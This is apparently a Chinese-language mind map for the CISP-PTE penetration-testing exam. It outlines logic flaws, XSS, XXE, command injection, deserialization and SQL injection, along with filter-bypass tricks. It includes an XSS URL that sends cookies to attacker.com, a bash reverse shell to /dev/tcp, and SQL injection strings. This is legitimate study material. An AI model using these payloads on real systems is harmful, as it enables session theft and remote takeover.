CISP-PTE思维脑图
2023-06-21 10:22:29 0 举报
AI智能生成
CISP- PTE考试脑图整理
作者其他创作
大纲/内容
唯一性数据修改,包括手机号、身份证
订单ID、商品ID修改
攻击方法
纵向越权
横向越权
方式
服务端对于请求的数据和当前用户做校验
id使用随机数
鉴权
修复方法
越权漏洞
支付漏洞
接口漏洞
cookie仿冒
会话固定攻击
cookie漏洞
登陆认证绕过
双因素认证
验证码绕过
验证码轰炸
登陆漏洞
密码找回漏洞
逻辑漏洞
目标是获取用户的cookie或者session
跨站脚本攻击
假设我们有一个电子商务网站,该网站在显示产品搜索结果时未对用户输入进行适当的验证或编码。一个正常的搜索URL可能看起来像这样:`http://www.example.com/search?q=手机`现在,攻击者构造了一个包含恶意JavaScript代码的搜索URL,比如:`http://www.example.com/search?q=<script>document.location='http://www.attacker.com/steal.php?cookie='+document.cookie</script>`然后,攻击者将这个恶意URL通过电子邮件、社交媒体或其他方式发送给受害者。如果受害者点击这个链接,搜索页面就会将JavaScript代码反射回用户的浏览器,并执行它。这段恶意脚本会获取用户的cookie,并将其发送到攻击者控制的网站。攻击者可以使用这些cookie来冒充用户,访问他们的账户,购物,或进行其他可能的恶意活动。
反弹型
存储型
XSS漏洞
XXE攻击指的是XML外部实体注入攻击(XML External Entity Injection),是一种常见的Web应用程序漏洞攻击
XXE漏洞
代码审计命令执行
执行命令页面
${}
eval
assert
preg_replace()
create_function()
shell_exec()
命令
;
上一条命令的输出,作为下一条命令参数
|
并行执行,
后台执行
&
左边的执行正确才会执行右边的
逻辑与
&&
左边的执行错误才会执行右边的
逻辑或
||
?可以替代任何字符
?
cat${IFS}1.txt
cat$IFS$91.txt
cat<1.txt
cat<>flag.txt
绕过方法
管道符
msf反向回连
|bash -i >& /dev/tcp/8.8.8.8/8080 0>&1
dnslog管道解析
没有回显
bypass绕过
命令执行RCE
序列化:把对象转换成字节序列的过程
反序列化:把子节转换成对象
定义
保存
传输
用途
serialize
unserialize
分支主题
php
有的题目结合sql注入考察反序列化漏洞,通过sql注入得到数据,发现某个值是序列化存储的。那么就要注意这个序列化的值在哪里被拿出来反序列化利用,再在那个利用点进行分析,构造序列化payload
注意php魔术方法,因为php的反序列化漏洞都和魔术方法挂钩,因为魔术方法的使用不当才导致了可以反序列化我们想要的值
反序列化漏洞配合代码审计,注意unserialize的位置,以及我们可控的参数,然后构造出可以出flag的payload
方法
反序列化
user_agent
X-Forwarded- For
referer
请求头域
POST数据不能有空格
POST
HTTP
工具?
ascii码
%
ascii码16进制
URL编码
=作为填充字符
base64编码
Subtopic 4
编码
6.and
7.or
SQL运算符优先级
from先执行
执行顺序
SQL
‘ or 1=‘1
万能密钥
sqlmap
必须是xpath
updata XML
sql报错
联合注入
页面没有回显,但是条件错了和对了,返回不一样
时间盲注
布尔盲注
sql盲注
宽子节注入
二次注入
cookie注入
类型
0x3a是十六进制的“:”
特殊字符
注释符/**/
%a0
括号绕过空格
双写
空格绕过
使用16进制
引号绕过
逗号绕过
between and
比较符绕过
#
-- -
注释符绕过
like,regexp
=绕过
双写Uniounionn
大小写 UniOn
U/**/Nion/**/SE
union、select、where
绕过bypass
思路:先寻找注入点,后想办法绕过
SQL注入
Subtopic 1
文件上传
文件包含
二层交换机端口没有MAC地址
网络知识
基础知识
企业SRC平台
PTE EAXAM
收藏
0 条评论
回复 删除
下一页